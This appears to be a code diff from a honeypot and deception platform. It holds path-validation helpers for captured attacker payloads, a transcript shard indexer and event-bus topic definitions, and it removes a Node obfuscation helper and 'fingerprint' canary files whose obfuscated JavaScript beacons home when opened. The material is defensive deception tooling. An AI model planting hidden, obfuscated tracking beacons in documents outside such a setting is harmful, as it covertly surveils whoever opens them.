Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
|
||||
quarantine tree:
|
||||
|
||||
/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
|
||||
|
||||
Two callers need to translate ``(decky, stored_as, service)`` into a
|
||||
concrete ``Path`` rooted under that tree:
|
||||
|
||||
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
|
||||
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
|
||||
download for the dashboard.
|
||||
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
|
||||
reads the stored ``.eml`` at tag-time so body-aware predicates
|
||||
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
|
||||
|
||||
Both callers share the same validation rules and the same
|
||||
defence-in-depth symlink-escape check; this module is the single
|
||||
implementation. It is auth-agnostic — wrappers layer authentication
|
||||
where appropriate (the router does ``require_admin``, the lifter does
|
||||
not).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import re
|
||||
from pathlib import Path
|
||||
|
||||
# decky names come from the deployer — lowercase alnum plus hyphens.
|
||||
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||
|
||||
# Services that own an artifacts subdir. Kept explicit so a caller
|
||||
# can't pivot into arbitrary subpaths via a query string or bus payload.
|
||||
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
|
||||
|
||||
# stored_as is assembled by the capturing template as:
|
||||
# ${ts}_${sha:0:12}_${base}
|
||||
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
|
||||
# and base is the original filename's basename. Keep the filename charset
|
||||
# tight but allow common punctuation dropped files actually use.
|
||||
_STORED_AS_RE = re.compile(
|
||||
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
|
||||
)
|
||||
|
||||
# Module-level so tests can monkeypatch. Override via env in production
|
||||
# (the systemd unit sets this) — the prod path matches the bind mount
|
||||
# declared in decnet/services/{ssh,smtp}.py.
|
||||
ARTIFACTS_ROOT = Path(
|
||||
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||
)
|
||||
|
||||
|
||||
class ArtifactPathError(ValueError):
|
||||
"""Raised when (decky, stored_as, service) fails validation or escapes
|
||||
the artifacts root.
|
||||
|
||||
The router catches this and re-raises HTTPException(400). The lifter
|
||||
catches it and treats the event as having no body available (no-tag).
|
||||
"""
|
||||
|
||||
|
||||
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
|
||||
"""Validate inputs, resolve the on-disk path, and confirm it stays
|
||||
inside the artifacts root.
|
||||
|
||||
Raises :class:`ArtifactPathError` on any violation. Does NOT check
|
||||
that the file exists — callers handle that distinctly (404 for the
|
||||
router, no-tag for the lifter).
|
||||
"""
|
||||
if service not in _ALLOWED_SERVICES:
|
||||
raise ArtifactPathError("invalid service")
|
||||
if not _DECKY_RE.fullmatch(decky):
|
||||
raise ArtifactPathError("invalid decky name")
|
||||
if not _STORED_AS_RE.fullmatch(stored_as):
|
||||
raise ArtifactPathError("invalid stored_as")
|
||||
|
||||
root = ARTIFACTS_ROOT.resolve()
|
||||
candidate = (root / decky / service / stored_as).resolve()
|
||||
# defence-in-depth: even though the regexes reject `..`, make sure a
|
||||
# symlink or weird filesystem state can't escape the root.
|
||||
if root not in candidate.parents and candidate != root:
|
||||
raise ArtifactPathError("path escapes artifacts root")
|
||||
return candidate
|
||||
@@ -1,129 +0,0 @@
|
||||
"""Shared asciinema shard helpers.
|
||||
|
||||
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
|
||||
so non-router callers (the BEHAVE-SHELL session-ended handler in
|
||||
``decnet/profiler/worker.py``, the collector's session aggregator)
|
||||
can resolve shard paths without crossing the layer boundary into the
|
||||
FastAPI router.
|
||||
|
||||
Functions here speak in :class:`ValueError` — callers that want HTTP
|
||||
semantics translate at the boundary. The router wrappers keep their
|
||||
existing ``HTTPException`` behaviour for backwards compatibility.
|
||||
|
||||
PII boundary unchanged: shards live on disk; this module returns
|
||||
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
|
||||
cache stores byte offsets only.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import re
|
||||
from collections import OrderedDict
|
||||
from pathlib import Path
|
||||
|
||||
ARTIFACTS_ROOT = Path(
|
||||
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
|
||||
)
|
||||
|
||||
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
|
||||
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
|
||||
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
|
||||
|
||||
# (path, mtime_ns) → {sid: [(offset, length), ...]}
|
||||
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
|
||||
OrderedDict()
|
||||
)
|
||||
_CACHE_MAX = 32
|
||||
|
||||
|
||||
def validate_names(decky: str, service: str) -> None:
|
||||
"""Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
|
||||
if not _DECKY_RE.fullmatch(decky):
|
||||
raise ValueError(f"invalid decky name: {decky!r}")
|
||||
if not _SERVICE_RE.fullmatch(service):
|
||||
raise ValueError(f"invalid service: {service!r}")
|
||||
|
||||
|
||||
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
|
||||
"""Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
|
||||
with escape-attempt detection. Raises :class:`ValueError` on
|
||||
invalid inputs.
|
||||
"""
|
||||
validate_names(decky, service)
|
||||
if not _SHARD_BASENAME_RE.fullmatch(shard_name):
|
||||
raise ValueError(f"invalid shard name: {shard_name!r}")
|
||||
root = ARTIFACTS_ROOT.resolve()
|
||||
candidate = (root / decky / service / "transcripts" / shard_name).resolve()
|
||||
if root not in candidate.parents and candidate != root:
|
||||
raise ValueError(f"path escapes artifacts root: {candidate}")
|
||||
return candidate
|
||||
|
||||
|
||||
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
|
||||
index: dict[str, list[tuple[int, int]]] = {}
|
||||
with path.open("rb") as f:
|
||||
offset = 0
|
||||
for line in f:
|
||||
length = len(line)
|
||||
m = _SID_LINE_RE.search(line)
|
||||
if m:
|
||||
sid = m.group(1).decode("ascii")
|
||||
index.setdefault(sid, []).append((offset, length))
|
||||
offset += length
|
||||
return index
|
||||
|
||||
|
||||
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
|
||||
"""Return ``(sid → [(offset, length), …], file_size)``.
|
||||
|
||||
Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
|
||||
"""
|
||||
st = path.stat()
|
||||
key = (str(path), st.st_mtime_ns)
|
||||
if key in _INDEX_CACHE:
|
||||
_INDEX_CACHE.move_to_end(key)
|
||||
return _INDEX_CACHE[key], st.st_size
|
||||
index = _build_index(path)
|
||||
_INDEX_CACHE[key] = index
|
||||
_INDEX_CACHE.move_to_end(key)
|
||||
while len(_INDEX_CACHE) > _CACHE_MAX:
|
||||
_INDEX_CACHE.popitem(last=False)
|
||||
return index, st.st_size
|
||||
|
||||
|
||||
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
|
||||
"""Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
|
||||
transcripts dir until one claims this ``sid``.
|
||||
|
||||
Newest shards first — most lookups are for recent sessions. Caches
|
||||
the per-shard sid index, so repeated calls are ~free until the
|
||||
shard's mtime changes.
|
||||
|
||||
Returns ``None`` when nothing claims the sid OR when the
|
||||
transcripts dir is missing / unreadable. Never raises on
|
||||
filesystem-level errors — callers treat ``None`` as "skip".
|
||||
"""
|
||||
validate_names(decky, service)
|
||||
root = ARTIFACTS_ROOT.resolve()
|
||||
transcripts_dir = (root / decky / service / "transcripts").resolve()
|
||||
if root not in transcripts_dir.parents:
|
||||
return None
|
||||
try:
|
||||
if not transcripts_dir.is_dir():
|
||||
return None
|
||||
entries = list(transcripts_dir.iterdir())
|
||||
except (OSError, PermissionError):
|
||||
return None
|
||||
shards = sorted(
|
||||
(p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
|
||||
reverse=True,
|
||||
)
|
||||
for shard in shards:
|
||||
try:
|
||||
index, _size = get_index(shard)
|
||||
except (OSError, PermissionError):
|
||||
continue
|
||||
if sid in index:
|
||||
return shard
|
||||
return None
|
||||
@@ -13,7 +13,7 @@ from typing import Sequence
|
||||
from decnet.asn.base import Provider
|
||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||
from decnet.asn.iptoasn.parse import parse_file
|
||||
from decnet.asn.lookup import AsnLookup, Range
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
from decnet.asn.paths import ensure_root
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
|
||||
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
||||
)
|
||||
|
||||
ranges: list[Range] = []
|
||||
ranges = []
|
||||
for path in self.data_paths():
|
||||
if not path.exists():
|
||||
continue
|
||||
|
||||
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
|
||||
up at all we no-op.
|
||||
"""
|
||||
try:
|
||||
from decnet.telemetry import wrap_repository
|
||||
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
|
||||
except ImportError:
|
||||
return bus
|
||||
try:
|
||||
|
||||
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
|
||||
contract the rest of this module already upholds.
|
||||
"""
|
||||
if bus is None:
|
||||
return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
|
||||
return lambda _topic, _payload, _event_type="": None
|
||||
|
||||
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||
# Stream threads may keep draining after the bus owner closed it
|
||||
|
||||
@@ -17,7 +17,6 @@ Token structure (NATS-style, dot-separated):
|
||||
attacker.scored
|
||||
attacker.session.started
|
||||
attacker.session.ended
|
||||
attacker.observation.{primitive}
|
||||
identity.formed
|
||||
identity.observation.linked
|
||||
identity.merged
|
||||
@@ -29,18 +28,12 @@ Token structure (NATS-style, dot-separated):
|
||||
campaign.unmerged
|
||||
credential.captured
|
||||
credential.reuse.detected
|
||||
attribution.profile.state_changed
|
||||
attribution.profile.multi_actor_suspected
|
||||
canary.{token_id}.triggered
|
||||
canary.{token_id}.placed
|
||||
canary.{token_id}.revoked
|
||||
system.log
|
||||
system.bus.health
|
||||
system.{worker}.health
|
||||
email.received
|
||||
ttp.tagged
|
||||
ttp.rule.fired.{technique_id}
|
||||
ttp.rule.suppressed
|
||||
|
||||
Wildcards (per :func:`decnet.bus.base.matches`):
|
||||
|
||||
@@ -59,12 +52,8 @@ IDENTITY = "identity"
|
||||
CAMPAIGN = "campaign"
|
||||
SYSTEM = "system"
|
||||
CREDENTIAL = "credential"
|
||||
ATTRIBUTION = "attribution"
|
||||
ORCHESTRATOR = "orchestrator"
|
||||
CANARY = "canary"
|
||||
SMTP = "smtp"
|
||||
EMAIL = "email"
|
||||
TTP = "ttp"
|
||||
|
||||
|
||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||
@@ -94,19 +83,6 @@ DECKY_MUTATE_REQUEST = "mutate_request"
|
||||
# syslog sidechannel too) to interleave substrate-change markers into
|
||||
# attacker traversals.
|
||||
DECKY_MUTATION = "mutation"
|
||||
# Per-service add/remove on a deployed decky (live; no full redeploy).
|
||||
# Payload carries ``decky_name``, ``service_name``, optional
|
||||
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
|
||||
# that watch substrate shape (correlator, dashboard, profiler) reconcile
|
||||
# off these without waiting for the next decnet-state.json snapshot.
|
||||
DECKY_SERVICE_ADDED = "service_added"
|
||||
DECKY_SERVICE_REMOVED = "service_removed"
|
||||
# Per-service config change (the schema-driven Inspector form). Payload
|
||||
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
|
||||
# ``service_config`` (the new validated dict), and ``recreated`` — true
|
||||
# when the operator hit Apply (container was force-recreated to pick up
|
||||
# the new env), false when they only hit Save (DB-only).
|
||||
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
|
||||
|
||||
# Attacker event types (second token under the ``attacker`` root). First
|
||||
# sighting, session boundary transitions, and score-threshold crossings
|
||||
@@ -118,14 +94,6 @@ ATTACKER_SCORED = "scored"
|
||||
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
||||
# a fingerprint is additional evidence about an already-observed attacker.
|
||||
ATTACKER_FINGERPRINTED = "fingerprinted"
|
||||
# Published when the prober observes a NEW hash for an
|
||||
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
|
||||
# attacker rotated their VPS, rebuilt their SSH server, swapped their
|
||||
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
|
||||
# result; ``fingerprint_rotated`` fires only on diff and carries both
|
||||
# old_hash + new_hash. Producer: prober (via the rotation library);
|
||||
# consumers: dashboard, forensics, attribution clustering.
|
||||
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
|
||||
ATTACKER_SESSION_STARTED = "session.started"
|
||||
ATTACKER_SESSION_ENDED = "session.ended"
|
||||
# Published by the ``decnet enrich`` worker after an enrichment pass
|
||||
@@ -133,19 +101,6 @@ ATTACKER_SESSION_ENDED = "session.ended"
|
||||
# returned a verdict). Payload carries the aggregate verdict + per-
|
||||
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
||||
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
||||
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
|
||||
# attacker.observation.<primitive>
|
||||
# e.g. ``attacker.observation.motor.input_modality``. Producer:
|
||||
# ``decnet/profiler/behave_shell/`` (extractor library called from the
|
||||
# profiler worker on ``attacker.session.ended``); consumers: dashboard
|
||||
# SSE relay, attribution engine state machine, federation gossip
|
||||
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
|
||||
# the wire-format contract — the prefix is documentation + pattern
|
||||
# match only; bus auth is socket file perms (DEBT-029 §2), not
|
||||
# topic-level. The ``primitive`` segment MAY contain dots
|
||||
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
|
||||
# rule that ``attacker.session.ended`` uses.
|
||||
ATTACKER_OBSERVATION_PREFIX = "observation"
|
||||
|
||||
# Identity-resolution event types (second/third tokens under ``identity``).
|
||||
# Published by the (future) clusterer worker — see
|
||||
@@ -213,42 +168,6 @@ CAMPAIGN_UNMERGED = "unmerged"
|
||||
CREDENTIAL_CAPTURED = "captured"
|
||||
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
||||
|
||||
# Attribution-engine event types (second/third tokens under
|
||||
# ``attribution``). Published by the v0 attribution worker
|
||||
# (``decnet.correlation.attribution_worker``) which subscribes to
|
||||
# ``attacker.observation.>`` and runs the per-(identity, primitive)
|
||||
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
|
||||
#
|
||||
# attribution.profile.state_changed — per-primitive state
|
||||
# transition (e.g.
|
||||
# stable → drifting).
|
||||
# Payload: identity_uuid,
|
||||
# primitive, old_state,
|
||||
# new_state, current_value,
|
||||
# confidence,
|
||||
# observation_count, ts.
|
||||
# attribution.profile.multi_actor_suspected — fires when ≥ 2
|
||||
# primitives flag the same
|
||||
# identity as multi_actor
|
||||
# concurrently. Cross-
|
||||
# primitive correlator;
|
||||
# single-primitive
|
||||
# multi_actor is too noisy
|
||||
# on its own. Payload:
|
||||
# identity_uuid, primitives,
|
||||
# evidence_summary,
|
||||
# confidence, ts.
|
||||
#
|
||||
# These are *derived* signals — distinct from
|
||||
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
|
||||
# ``attacker.observation.*`` (raw extractor envelopes,
|
||||
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
|
||||
# the attribution engine, the engine emits derived state, the clusterer
|
||||
# reads observations + state to form / merge identities.
|
||||
ATTRIBUTION_PROFILE_PREFIX = "profile"
|
||||
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
|
||||
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
|
||||
|
||||
# Canary-token event types (third token under ``canary``).
|
||||
#
|
||||
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
||||
@@ -312,43 +231,6 @@ WORKER_CONTROL_START = "start"
|
||||
# of patterns. Payload is currently empty; consumers only need the signal.
|
||||
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
||||
|
||||
# Email-receipt event — fired by smtp / smtp-relay services on full-message
|
||||
# receipt (envelope + headers + body + attachments captured). Single-token
|
||||
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
|
||||
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
|
||||
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
|
||||
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
|
||||
# bytes.
|
||||
EMAIL_RECEIVED = "received"
|
||||
|
||||
# TTP-tagging event types (second/third tokens under ``ttp``).
|
||||
#
|
||||
# ttp.tagged — one or more new tags written. Published
|
||||
# only when ``INSERT OR IGNORE`` wrote at
|
||||
# least one new row; idempotent
|
||||
# re-evaluations publish nothing
|
||||
# (loop-prevention invariant — see
|
||||
# TTP_TAGGING.md).
|
||||
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
|
||||
# consumers that subscribe to a single
|
||||
# technique. Topic key is the parent
|
||||
# technique; sub_technique is in the
|
||||
# payload. Built via :func:`ttp_rule_fired`.
|
||||
# ttp.rule.suppressed — rule fired but the tag was dropped
|
||||
# (confidence below floor, rate-limited,
|
||||
# or the rule's RuleState was disabled).
|
||||
# Observability signal for the dashboard.
|
||||
#
|
||||
# Per-rule reload + state-change topics. Built via
|
||||
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
|
||||
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
|
||||
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
|
||||
TTP_TAGGED = "tagged"
|
||||
TTP_RULE_FIRED = "rule.fired"
|
||||
TTP_RULE_SUPPRESSED = "rule.suppressed"
|
||||
TTP_RULE_RELOADED = "rule.reloaded"
|
||||
TTP_RULE_STATE = "rule.state"
|
||||
|
||||
|
||||
# ─── Builders ────────────────────────────────────────────────────────────────
|
||||
|
||||
@@ -419,42 +301,6 @@ def attacker(event_type: str) -> str:
|
||||
return f"{ATTACKER}.{event_type}"
|
||||
|
||||
|
||||
def attacker_observation(primitive: str) -> str:
|
||||
"""Build ``attacker.observation.<primitive>``.
|
||||
|
||||
*primitive* is the fully-qualified BEHAVE-SHELL primitive path
|
||||
(e.g. ``motor.input_modality``,
|
||||
``cognitive.feedback_loop_engagement``,
|
||||
``motor.shell_mastery.tab_completion``). Dotted primitives are
|
||||
permitted — this matches the format
|
||||
``behave_shell.spec.event_adapter.event_topic_for`` produces
|
||||
upstream, and DECNET's bus admits the dotted leaf the same way
|
||||
:func:`attacker` does for ``session.started``.
|
||||
|
||||
Empty string is rejected so a downstream typo doesn't ship as
|
||||
``attacker.observation.``.
|
||||
"""
|
||||
if not primitive:
|
||||
raise ValueError(
|
||||
"attacker_observation topic requires a non-empty primitive",
|
||||
)
|
||||
return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
|
||||
|
||||
|
||||
def attribution(event_type: str) -> str:
|
||||
"""Build ``attribution.<event_type>``.
|
||||
|
||||
*event_type* is typically one of
|
||||
:data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
|
||||
:data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
|
||||
dot (``profile.state_changed``) which is permitted under the same
|
||||
"trailing dotted leaf" rule that ``attacker.session.started`` uses.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("attribution topic requires a non-empty event_type")
|
||||
return f"{ATTRIBUTION}.{event_type}"
|
||||
|
||||
|
||||
def campaign(event_type: str) -> str:
|
||||
"""Build ``campaign.<event_type>``.
|
||||
|
||||
@@ -535,86 +381,6 @@ def system_control(worker: str) -> str:
|
||||
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
||||
|
||||
|
||||
def smtp(event_type: str) -> str:
|
||||
"""Build ``smtp.<event_type>``.
|
||||
|
||||
*event_type* may contain dots (e.g. ``probe.pending``).
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("smtp topic requires a non-empty event_type")
|
||||
return f"{SMTP}.{event_type}"
|
||||
|
||||
|
||||
def email_topic(event_type: str) -> str:
|
||||
"""Build ``email.<event_type>``.
|
||||
|
||||
Named ``email_topic`` rather than ``email`` to avoid shadowing the
|
||||
Python ``email`` stdlib package at import sites that pull both.
|
||||
*event_type* is typically :data:`EMAIL_RECEIVED`.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("email topic requires a non-empty event_type")
|
||||
return f"{EMAIL}.{event_type}"
|
||||
|
||||
|
||||
def ttp(event_type: str) -> str:
|
||||
"""Build ``ttp.<event_type>``.
|
||||
|
||||
*event_type* is typically one of :data:`TTP_TAGGED`,
|
||||
:data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
|
||||
leaves (``rule.fired``) are permitted — same rationale as
|
||||
:func:`system`. For per-technique fan-out use
|
||||
:func:`ttp_rule_fired`.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("ttp topic requires a non-empty event_type")
|
||||
return f"{TTP}.{event_type}"
|
||||
|
||||
|
||||
def ttp_rule_fired(technique_id: str) -> str:
|
||||
"""Build ``ttp.rule.fired.<technique_id>``.
|
||||
|
||||
Per-technique fan-out: SIEM subscribers can listen on
|
||||
``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
|
||||
one technique. *technique_id* is validated as a single segment —
|
||||
sub-techniques like ``T1110.001`` are rejected because they would
|
||||
split into two tokens. The topic key is the parent technique;
|
||||
``sub_technique_id`` lives in the payload.
|
||||
"""
|
||||
_reject_tokens(technique_id)
|
||||
return f"{TTP}.rule.fired.{technique_id}"
|
||||
|
||||
|
||||
def ttp_rule_reloaded(rule_id: str) -> str:
|
||||
"""Build ``ttp.rule.reloaded.<rule_id>``.
|
||||
|
||||
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
|
||||
when a rule's *definition* changes (YAML edit on the filesystem
|
||||
backend, ``ttp_rule`` row update on the database backend). One event
|
||||
per per-rule edit — never batched (the "incremental, never batched"
|
||||
property in TTP_TAGGING.md §"Bus topics" inherits its granularity
|
||||
from :meth:`RuleStore.subscribe_changes`).
|
||||
|
||||
Subscribers: ``ttp.rule.reloaded.>`` for every rule,
|
||||
``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
|
||||
single segment.
|
||||
"""
|
||||
_reject_tokens(rule_id)
|
||||
return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
|
||||
|
||||
|
||||
def ttp_rule_state(rule_id: str) -> str:
|
||||
"""Build ``ttp.rule.state.<rule_id>``.
|
||||
|
||||
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
|
||||
when a rule's *operational state* changes (operator hits the disable
|
||||
button, an ``expires_at`` TTL fires and auto-reverts the state).
|
||||
*rule_id* is validated as a single segment.
|
||||
"""
|
||||
_reject_tokens(rule_id)
|
||||
return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
|
||||
|
||||
|
||||
def _reject_tokens(*parts: str) -> None:
|
||||
"""Reject topic segments that would break NATS-style tokenization.
|
||||
|
||||
|
||||
@@ -1,18 +0,0 @@
|
||||
// Node helper invoked by decnet.canary.obfuscator.
|
||||
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
|
||||
// Kept dependency-light on purpose: only javascript-obfuscator.
|
||||
const JsObf = require('javascript-obfuscator');
|
||||
|
||||
let raw = '';
|
||||
process.stdin.setEncoding('utf8');
|
||||
process.stdin.on('data', (chunk) => { raw += chunk; });
|
||||
process.stdin.on('end', () => {
|
||||
try {
|
||||
const { code, options } = JSON.parse(raw);
|
||||
const result = JsObf.obfuscate(code, options || {});
|
||||
process.stdout.write(result.getObfuscatedCode());
|
||||
} catch (e) {
|
||||
process.stderr.write(String(e && e.stack || e));
|
||||
process.exit(2);
|
||||
}
|
||||
});
|
||||
@@ -100,12 +100,6 @@ class CanaryArtifact:
|
||||
planting. Never leaked to the attacker-facing surface.
|
||||
"""
|
||||
|
||||
fingerprint_nonce: Optional[str] = None
|
||||
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
|
||||
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
|
||||
so the worker can validate incoming ``?k=`` params.
|
||||
"""
|
||||
|
||||
|
||||
class CanaryGenerator(ABC):
|
||||
"""Produces a fake artifact from scratch."""
|
||||
|
||||
@@ -46,8 +46,6 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
|
||||
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
|
||||
}
|
||||
|
||||
|
||||
@@ -64,8 +62,6 @@ _GENERATOR_TO_KIND: dict[str, str] = {
|
||||
"honeydoc_pdf": "http",
|
||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
|
||||
"fingerprint_svg": "http", # same, embedded inside SVG <script>
|
||||
}
|
||||
|
||||
|
||||
@@ -82,8 +78,6 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
|
||||
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
|
||||
}
|
||||
|
||||
|
||||
@@ -142,12 +136,10 @@ async def cultivate(
|
||||
)
|
||||
|
||||
callback_token = _new_callback_token()
|
||||
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
|
||||
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
|
||||
ctx = CanaryContext(
|
||||
callback_token=callback_token,
|
||||
http_base=http_base_str,
|
||||
dns_zone=dns_zone_str,
|
||||
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
|
||||
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
|
||||
persona="linux", # all our deckies are POSIX in MVP
|
||||
)
|
||||
generator = get_generator(gen_name)
|
||||
@@ -162,7 +154,7 @@ async def cultivate(
|
||||
# attribute a callback if the artifact trips during the plant
|
||||
# itself (improbable but possible — DOCX viewers can preview
|
||||
# autoplay-style).
|
||||
token_data: dict = {
|
||||
await repo.create_canary_token({
|
||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||
"decky_name": plan.decky_name,
|
||||
"instrumenter": None,
|
||||
@@ -173,10 +165,7 @@ async def cultivate(
|
||||
"placed_at": datetime.now(timezone.utc),
|
||||
"created_by": created_by,
|
||||
"state": "planted",
|
||||
}
|
||||
if artifact.fingerprint_nonce is not None:
|
||||
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
|
||||
await repo.create_canary_token(token_data)
|
||||
})
|
||||
|
||||
# Carry the placement_path on the artifact so the orchestrator's
|
||||
# plant_file call uses it. We don't mutate the generator's
|
||||
|
||||
@@ -131,7 +131,7 @@ def _build_response(
|
||||
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
||||
|
||||
answer = b""
|
||||
if an_count and answer_ip is not None:
|
||||
if an_count:
|
||||
# Use a name pointer back to the question (offset 12).
|
||||
ptr = struct.pack("!H", 0xC000 | 12)
|
||||
rdata = bytes(int(o) for o in answer_ip.split("."))
|
||||
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
||||
self._answer_ip = answer_ip
|
||||
self._transport: Optional[asyncio.DatagramTransport] = None
|
||||
|
||||
def connection_made(self, transport) -> None:
|
||||
self._transport = transport
|
||||
def connection_made(self, transport) -> None: # type: ignore[override]
|
||||
self._transport = transport # type: ignore[assignment]
|
||||
|
||||
def datagram_received(
|
||||
def datagram_received( # type: ignore[override]
|
||||
self, data: bytes, addr: Tuple[str, int],
|
||||
) -> None:
|
||||
try:
|
||||
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
||||
return
|
||||
# Known name — answer with our sinkhole IP, then fire the hook.
|
||||
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
||||
